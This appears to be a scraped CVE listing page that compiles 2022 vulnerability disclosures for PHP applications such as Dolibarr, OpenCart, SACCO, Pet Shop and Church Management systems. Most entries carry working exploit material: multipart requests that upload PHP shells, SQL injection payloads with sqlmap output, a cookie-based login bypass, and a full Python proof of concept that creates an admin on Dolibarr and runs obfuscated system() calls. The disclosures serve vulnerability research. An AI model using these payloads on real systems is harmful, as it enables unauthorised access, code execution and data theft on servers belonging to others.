Online Diagnostic Lab Management System v1.0 was discovered to contain an arbitrary file upload vulnerability via the component /php_action/editProductImage.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

Permalink

Cannot retrieve contributors at this time

**Online Diagnostic Lab Management System v1.0 by mayuri\_k has arbitrary code execution (RCE)**

BUG\_Author: 袁世冲

vendors: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability url: ip/diagnostic/php\_action/editProductImage.php?id=2

Loophole location: Online Diagnostic Lab Management System's editProductImage.php file exists arbitrary file upload (RCE)

Request package for file upload：

POST /diagnostic/php\_action/editProductImage.php?id\=2 HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.88/diagnostic/edittest.php?id=2
Cookie: PHPSESSID=flklolh755oivesj89eu5fo2c7
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------25689655923079
Content-Length: 431
\-----------------------------25689655923079
Content-Disposition: form-data; name="old\_image"
shell.php
\-----------------------------25689655923079
Content-Disposition: form-data; name="productImage"; filename="shell.php"
Content-Type: application/octet-stream
<?php phpinfo(); ?>
\-----------------------------25689655923079
Content-Disposition: form-data; name="btn"
\-----------------------------25689655923079--

The files will be uploaded to this directory \\diagnostic\\assets\\myimages\\

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-41533: bug_report/RCE-1.md at main · xuewawa/bug_report

Cross Site Request Forgery (CSRF) vulnerability in ResIOT ResIOT IOT Platform + LoRaWAN Network Server through 4.1.1000114 allows attackers to add new admin users to the platform or other unspecified impacts.

CVE-2022-34020: Cross-Site Request Forgery Prevention - OWASP Cheat Sheet Series

OpenCart 3.x Newsletter Custom Popup was discovered to contain a SQL injection vulnerability via the email parameter at index.php?route=extension/module/so_newletter_custom_popup/newsletter.

    # Exploit Title: OpenCart v3.x So Newsletter Custom Popup Module - Blind SQL Injection# Date: 18/09/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.opencart.com/# Software Link: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=40259&filter_search=newsletter&filter_license=1&sort=date_added# Version: v.4.0# Tested on: XAMPP, Linux# Contact: https://twitter.com/dmaral3noz* Description :So Newsletter Custom Popup Module is compatible with any Opencart allows SQL Injection via parameter 'email' in index.php?route=extension/module/so_newletter_custom_popup/newsletter. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.* Steps to Reproduce :- Go to : http://127.0.0.1/index.php?route=extension/module/so_newletter_custom_popup/newsletter- Save request in BurpSuite- Run saved request with : sqlmap -r sql.txt -p email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbsRequest :===========POST /index.php?route=extension/module/so_newletter_custom_popup/newsletter HTTP/1.1Content-Type: application/x-www-form-urlencodedCookie: OCSESSID=aaf920777d0aacdee96eb7eb50Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflateContent-Length: 29Host: 127.0.0.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0Connection: Keep-alivecreatedate=2022-8-28%2019:4:6&email=hi&status=0===========Output :Parameter: #1* ((custom) POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: createdate=2022-8-28 19:4:6&email=hi' AND 4805=4805-- nSeP&status=0    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: createdate=2022-8-28 19:4:6&email=hi' AND (SELECT 4828 FROM(SELECT COUNT(*),CONCAT(0x7176627071,(SELECT (ELT(4828=4828,1))),0x7178786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sRQS&status=0

CVE-2022-41403: OpenCart 3.x Newsletter Custom Popup 4.0 SQL Injection ≈ Packet Storm

Dolibarr ERP & CRM <=15.0.3 is vulnerable to Eval injection. By default, any administrator can be added to the installation page of dolibarr, and if successfully added, malicious code can be inserted into the database and then execute it by eval.

**2022/10/08 update**

POC:

import requests
from requests.packages import urllib3
import time
import random
import sys
import re

sess \= requests.Session()
pcre \= re.compile(r'name=\\"token\\"\\s+value=\\"(\[^>\]+)\\"\\s\*\[/\]\*>')
def request(method, url, headers\=None, data\=None, proxies\=None, timeout\=30):
    i \= 1
    urllib3.disable\_warnings()
    resp \= None
    proxies \= proxies
    while i <= 3:
        try:
            resp \= sess.request(method\=method, url\=url, headers\=headers,
                                    data\=data, proxies\=proxies, timeout\=timeout, verify\=False)
            break
        except requests.exceptions.TooManyRedirects:
            break
        except requests.exceptions.ConnectionError as e:
            time.sleep(2 + random.randint(1, 4))
        except (requests.exceptions.ConnectTimeout, requests.exceptions.ReadTimeout, requests.exceptions.Timeout):
            time.sleep(2 + random.randint(1, 4))
        finally:
            i += 1
    if i \> 3:
        print('\[-\]Error retrieve with max retries: {}'.format(url))
    return resp

def exp():
    if len(sys.argv) < 2:
        sys.exit('Usage: python3 {} http://xxxxx.com/'.format(sys.argv\[0\]))
    if sys.argv\[1\]\[\-1\] \== '/':
        base \= sys.argv\[1\].rsplit('/', 1)\[0\]
    else:
        base \= sys.argv\[1\]
    headers \= {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36',
    }
    #proxies = {'http': 'http://127.0.0.1:8082', 'https': 'http://127.0.0.1:8082'}
    proxies \= None
    res \= request('GET', base, headers\=headers, proxies\=proxies)
    err\_flag \= 1
    if res:
        print('\[\*\] Attempt to add admin.')
        base \= res.url.rsplit('/', 1)\[0\]
        add\_admin\_url \= '{}/install/step5.php'.format(base)
        data \= {
            'action': 'set',
            'login': 'testadmins',
            'pass': 'testadmins',
            'pass\_verif': 'testadmins',
            'selectlang': 'auto'
        }
        headers\['Content-Type'\] \= 'application/x-www-form-urlencoded'
        res \= request('POST', add\_admin\_url, headers\=headers, data\=data, proxies\=proxies)
        if res and 'created successfully' in res.text or ('exists' in res.text and 'Email  already exists' not in res.text):
            csrf\_token\_url \= '{}/index.php'.format(base)
            res \= request('GET', csrf\_token\_url, headers\=headers, proxies\=proxies)
            if res:
                print('\[\*\] Attempt to login.')
                try:
                    csrf\_token \= pcre.findall(res.text)\[0\]
                except:
                    csrf\_token \= ''
                login\_url \= '{}/index.php?mainmenu=home'.format(base)
                headers\['Referer'\] \= csrf\_token\_url
                data \= {
                    'token':'{}'.format(csrf\_token),
                    'actionlogin': 'login',
                    'loginfunction': 'loginfunction',
                    'username': 'testadmins',
                    'password': 'testadmins'
                }
                res \= request('POST', login\_url, headers\=headers, data\=data, proxies\=proxies)
                if res and res.status\_code \== 200 and 'logout.php' in res.text:
                    print('\[\*\] Attempt to get csrf token.')
                    csrf\_token\_url \= '{}/admin/menus/edit.php?menuId=0&action=create&menu\_handler=eldy\_menu'.format(base)
                    res \= request('GET', csrf\_token\_url, headers\=headers, proxies\=proxies)
                    if res:
                        print('\[\*\] Attemp to inset evil data.')
                        try:
                            csrf\_token \= pcre.findall(res.text)\[0\]
                        except:
                            csrf\_token \= ''
                        inset\_evil\_url \= '{}/admin/menus/edit.php'.format(base)
                        data \= {
                            'token': '{}'.format(csrf\_token),
                            'action': 'add',
                            'menuId': random.randint(10000, 99999),
                            'menu\_handler': 'eldy\_menu',
                            'user': 2,
                            'type': 1,
                            'titre': 1,
                            'url': 1,
                            'enabled': "1==1));$d=base64\_decode('ZWNobyAnPCEtLScmJmVjaG8gcHduZWQhISEmJmlkJiZlY2hvJy0tPic=');$a=base64\_decode('c3lzdGVt');$a($d);//" #execute id command，bypass core/lib/function.lib.php limits
                        }
                        res \= request('POST', inset\_evil\_url, headers\=headers, data\=data, proxies\=proxies)
                        if res and res.history\[0\].status\_code \== 302:
                            print('\[\*\] Attemp to execute command.')
                            request('GET', '{}/admin/menus/index.php'.format(base), headers\=headers, proxies\=proxies)
                            time.sleep(3)
                            evil\_url \= '{}/admin/index.php'.format(base)
                            res \= request('GET', evil\_url, headers\=headers, proxies\=proxies)
                            if res and res.status\_code \== 200 and 'pwned!!!' in res.text:
                                print(res.text\[:100\])
                                print('\[+\] vulnrable! {}'.format(base))
                                err\_flag \= 0
                    
    if err\_flag:
        print('\[-\] {} is not exploitable.'.format(sys.argv\[1\]))

exp()

**1\. Introduction**

Dolibarr ERP & CRM is a modern software package that helps manage your organization's activity (contacts, suppliers, invoices, orders, stocks, agenda…).

It's an Open Source Software suite (written in PHP with optional JavaScript enhancements) designed for small, medium or large companies, foundations and freelancers.

dolibarr<=15.0.3 has an arbitrary add administrator vulnerability and a backend remote code execution vulnerability.

**2\. Vulnerability****2.1 add super administrators without authorization**

Dolibarr does not automatically add install.lock after installation, it needs to be added manually by the user in the documents directory. For this feature, you can add as many super administrators as you want, using the section for adding super administrators during installation: install/step4.php.

**2.2 Backend RCE**

Firstly, use the edit function of menus to add malicious data to the database, here we use file_put_contents to write files.

    POST /dolibarr1502/htdocs/admin/menus/edit.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 299
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/dolibarr/htdocs/admin/menus/edit.php?menuId=0&action=create&menu_handler=eldy&backtopage=%2Fdolibarr%2Fhtdocs%2Fadmin%2Fmenus%2Findex.php
    Cookie: PHPSESSID=mtkbsit3sr99f9relns8b9isbf; DOLINSTALLNOPING_017fb6a80b4fcc706353a7f3b168d939=1; DOLSESSID_90637d005b446cd27f1f5444eb5ac092=2m4fegod13gk193u8g7js4nql5
    Upgrade-Insecure-Requests: 1
    
    token=5de221f6658ef66579740ae1636d24a6&action=add&menuId=12345671&menu_handler=eldy_menu&user=2&type=1&titre=1&url=1&enabled=1%3D%3D1%29%29%3B%24a%3Dbase64_decode%28%27ZmlsZV9wdXRfY29udGVudHM%3D%27%29%3B%24a%28%27.1234.php%27%2Cbase64_decode%28%27PD9waHAgcGhwaW5mbygpOz8%2BCg%3D%3D%27%29%29%3B%2F%2F
    

View the database table llx_menu and successfully add malicious data:

Secondly, access to http://localhost/dolibarr1502/htdocs/admin/menus/index.php, will generate malicious PHP files in the admin/menus/ directory.

**3\. Analysis**

The dol_eval function in htdocs/core/lib/functions.lib.php can execute arbitrary code, the dol\_eval caller also in the verifCond function in this file. If you can control $s and bypass the forbidden restriction (bypass with php features: **variable functions**), you can execute arbitrary code.

Looking for controllable calls to the verifCond function, I found the menuLoad method in htdocs/core/class/menubase.class.php. The menuLoad method has two calls to verifCond.

But $memu is fetched from the database, so go ahead and look at the logic of the $resql statement. Focus on the table: MAIN_DB_PREFIX.menu, and m.entity in (0, $conf->entity), m.menu_handler IN ($this->db->escape($menu_handler),'all')". And $menu_handler is the parameter passed in. The condition to be satisfied is: eldy

$sql = "SELECT m.rowid, m.type, m.module, m.fk\_menu, m.fk\_mainmenu, m.fk\_leftmenu, m.url, m.titre, m.langs, m.perms, m.enabled, m.target, m.mainmenu, m.leftmenu, m.position";
$sql .= " FROM ".MAIN\_DB\_PREFIX."menu as m";
$sql .= " WHERE m.entity IN (0,".$conf\->entity.")";
$sql .= " AND m.menu\_handler IN ('".$this\->db\->escape($menu\_handler)."','all')";
if ($type\_user == 0) $sql .= " AND m.usertype IN (0,2)";
if ($type\_user == 1) $sql .= " AND m.usertype IN (1,2)";
$sql .= " ORDER BY m.position, m.rowid";

So, we need to find the code to insert or modify the table MAIN_DB_PREFIX.menu.

The create function, also located in htdocs/core/class/menubase.class.php, is used to add a piece of data to MAIN_DB_PREFIX.menu, focusing on perms, enabled, entity, and menu_handler. handler, where entityis$conf->entity\` which just meets the conditions described above.

Keep track of the remaining three variables, located in htdocs/admin/menus/edit.php, all of which we can control.

CVE-2022-40871: GitHub - youncyb/dolibarr-rce: DOLIBARR ERP & CRM  rce

A vulnerability classified as critical was found in Mediabridge Medialink. This vulnerability affects unknown code of the file /index.asp. The manipulation leads to improper authentication. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-210700.

**Exploit Title: Medialink Unauthorized access****Date: 2022-10/12****Exploit Author: Peanut886****Vendor Homepage: http://www.medialinks.net.cn****Version: V3.0****Tested on: windows10 + phpstudy****Description**

In the MediaLink router login interface, request /index.asp, Cookie plus language=en; admin:language=en: bypasses the login interface to achieve unauthorized access.

**Payload used:**

    GET /index.asp HTTP/1.1
    Host: TARGET:PORT
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: SVC://TARGET:PORT/login.asp
    Connection: close
    Cookie: language=en; admin:language=en
    Upgrade-Insecure-Requests: 1
    

**Returns part of the package**

CVE-2022-3465: Vulnerability/MediaLink Unauthorized access.md at main · Peanut886/Vulnerability

Open Source SACCO Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /sacco_shield/ajax.php?action=delete_plan.

Permalink

Cannot retrieve contributors at this time

**Open Source SACCO Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: H1dd3n

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15372/open-source-sacco-management-system-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /sacco\_shield/ajax.php?action=delete\_plan

Vulnerability location: /sacco\_shield/ajax.php?action=delete\_plan, id

dbname = sacco,length=5

\[+\] Payload: id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /sacco\_shield/ajax.php?action\=delete\_plan HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-41532: bug_report/SQLi-1.md at main · yueleve/bug_report

Open Source SACCO Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /sacco_shield/ajax.php?action=delete_borrower.

Permalink

Cannot retrieve contributors at this time

**Open Source SACCO Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: H1dd3n

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15372/open-source-sacco-management-system-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /sacco\_shield/ajax.php?action=delete\_borrower

Vulnerability location: /sacco\_shield/ajax.php?action=delete\_borrower, id

dbname = sacco,length=5

\[+\] Payload: id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /sacco\_shield/ajax.php?action\=delete\_borrower HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-41530: bug_report/SQLi-2.md at main · yueleve/bug_report

Online Pet Shop We App v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/?page=orders/view_order.

**Online Pet Shop We App v1.0 by oretnom23 has SQL injection**

BUG\_Author: Cokutau-CH

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14839/online-pet-shop-we-app-using-php-and-paypal-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /pet\_shop/admin/?page=orders/view\_order&id=

Vulnerability location: /pet\_shop/admin/?page=orders/view\_order&id=,id

dbname=pet\_shop\_db,length=11

\[+\] Payload: /pet\_shop/admin/?page=orders/view\_order&id=-2%27%20union%20select%201,2,database(),4,5,6,7,8,9,10--+ // Leak place ---> id

GET /pet\_shop/admin/?page\=orders/view\_order&id\=\-2%27%20union%20select%201,2,database(),4,5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=39d40bnp4n4treun1nco3uocnm
Connection: close

CVE-2022-41407: Bug_report/SQLi-2.md at main · CokuTau-CH/Bug_report

An arbitrary file upload vulnerability in the /admin/admin_pic.php component of Church Management System v1.0 allows attackers to execute arbitrary code via a crafted PHP file.

Permalink

Cannot retrieve contributors at this time

**Church Management System v1.0 by Godfrey De Blessed has arbitrary code execution (RCE)**

BUG\_Author: Cokutau-CH

vendors: https://www.sourcecodester.com/php/11206/church-management-system.html

The program is built using the xmapp-php8.1 version

Login account: admin/admin (Super Admin account)

Vulnerability url: ip/cman/admin/admin\_pic.php

Loophole location: Church Management System's admin/admin\_pic.php file exists arbitrary file upload (RCE)

Request package for file upload：

POST /cman/admin/admin\_pic.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/cman/admin/dashboard.php
Cookie: PHPSESSID=fjhrjdpuej6edqv5haoadpj3lc
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------211491645714374
Content-Length: 327
\-----------------------------211491645714374
Content-Disposition: form-data; name="image"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------211491645714374
Content-Disposition: form-data; name="change"
\-----------------------------211491645714374--

The files will be uploaded to this directory \\cman\\admin\\uploads

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-41406: Bug_report/RCE-1.md at main · CokuTau-CH/Bug_report

Cross-Site Request Forgery (CSRF) vulnerability in Cozmoslabs Profile Builder plugin <= 3.6.0 at WordPress allows uploading the JSON file and updating the options. Requires Import and Export add-on.

Tag

#firefox